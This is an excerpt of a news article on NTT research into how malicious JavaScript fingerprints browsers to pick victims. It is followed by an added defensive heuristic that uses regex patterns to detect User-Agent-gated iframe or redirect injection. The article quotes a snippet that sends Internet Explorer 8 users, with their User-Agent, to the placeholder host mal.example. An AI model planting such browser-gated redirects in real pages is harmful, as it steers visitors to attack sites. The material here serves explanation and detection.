How evil JavaScript helps attackers tag possible victims – and gives away their intent

www.theregister.co.uk | 8/9/2018 | Staff

A honeypot project operated by Japanese comms company NTT has turned up a bunch of new approaches to malware obfuscation.

Yuta Takata of NTT's Secure Platform Laboratories has published an analysis at the Asia Pacific Network Information Centre (APNIC). In it, he wrote that since JavaScript can be used to identify different (and vulnerable) browsers, it's worth watching to see if malware authors are using it that way.

Takata's group identified five evasion techniques that all abuse differences between JavaScript implementations, he stated. That is more complex than the familiar redirection attacks that look at the User-Agent and redirect victims to pages specific to their browser.

In other words, this code would redirect an Internet Explorer 8 user to an attack site, but leave others alone:

    // Read the browser's self-reported User-Agent string.
    var ua = navigator.userAgent;
    // Only Internet Explorer 8 is sent onward; other browsers are left alone.
    if (ua.indexOf("MSIE 8") > -1) {
        var ifr = document.createElement("iframe");
        ifr.setAttribute("src", "http://mal.example/ua=" + ua);
        document.body.appendChild(ifr);
    }
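From the defender's side, the User-Agent redirect above leaves a recognisable shape in script source: a read of navigator.userAgent, a test against a specific browser token, and a content-loading sink. The following static heuristic is an added example, not code from the article or from NTT's research; the function name, result fields and sample strings are assumptions made for illustration.

```javascript
// Added example: static heuristic for User-Agent-gated content injection.
// findUaGatedInjection and its result fields are hypothetical names.
function findUaGatedInjection(source) {
  // 1. Variables assigned from navigator.userAgent (e.g. `var ua = navigator.userAgent`).
  const uaVars = new Set(["navigator.userAgent"]);
  const assignRe = /(?:var|let|const)\s+([A-Za-z_$][\w$]*)\s*=\s*navigator\.userAgent\b/g;
  for (const m of source.matchAll(assignRe)) uaVars.add(m[1]);

  // 2. Browser tokens those variables are tested against.
  const tokens = [];
  for (const v of uaVars) {
    const esc = v.replace(/[.$]/g, "\\$&"); // escape regex metacharacters in the name
    const testRe = new RegExp(
      "(?<![\\w$])" + esc +
      "\\s*\\.\\s*(?:indexOf|includes|match|search)\\s*\\(\\s*[\"'/]([^\"'/]+)", "g");
    for (const m of source.matchAll(testRe)) tokens.push(m[1]);
  }

  // 3. Sinks that load or navigate to content chosen by the script.
  const sinkPatterns = {
    "iframe/script creation": /createElement\s*\(\s*["'](?:iframe|script)/i,
    "location redirect": /\blocation(?:\.href)?\s*=(?!=)|\blocation\.(?:replace|assign)\s*\(/,
    "document.write": /document\.write(?:ln)?\s*\(/,
  };
  const sinks = Object.keys(sinkPatterns).filter((k) => sinkPatterns[k].test(source));

  // Flag only when a browser test and a sink occur in the same script.
  return { uaVars: [...uaVars], tokens, sinks,
           suspicious: tokens.length > 0 && sinks.length > 0 };
}

// Constructed samples: the article's redirect pattern, and a benign UA read.
const SAMPLE_GATED = `
var ua = navigator.userAgent;
if (ua.indexOf("MSIE 8") > -1) {
  var ifr = document.createElement("iframe");
  ifr.setAttribute("src", "http://mal.example/ua=" + ua);
  document.body.appendChild(ifr);
}`;
const SAMPLE_BENIGN = `var ua = navigator.userAgent; console.log("client:", ua);`;

console.log(findUaGatedInjection(SAMPLE_GATED));
console.log(findUaGatedInjection(SAMPLE_BENIGN));
```

This heuristic covers only the User-Agent case. The techniques Takata's group describes abuse differences between JavaScript implementations and never need to read the User-Agent, so they fall outside what it can see.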

It...
(Excerpt) Read more at: www.theregister.co.uk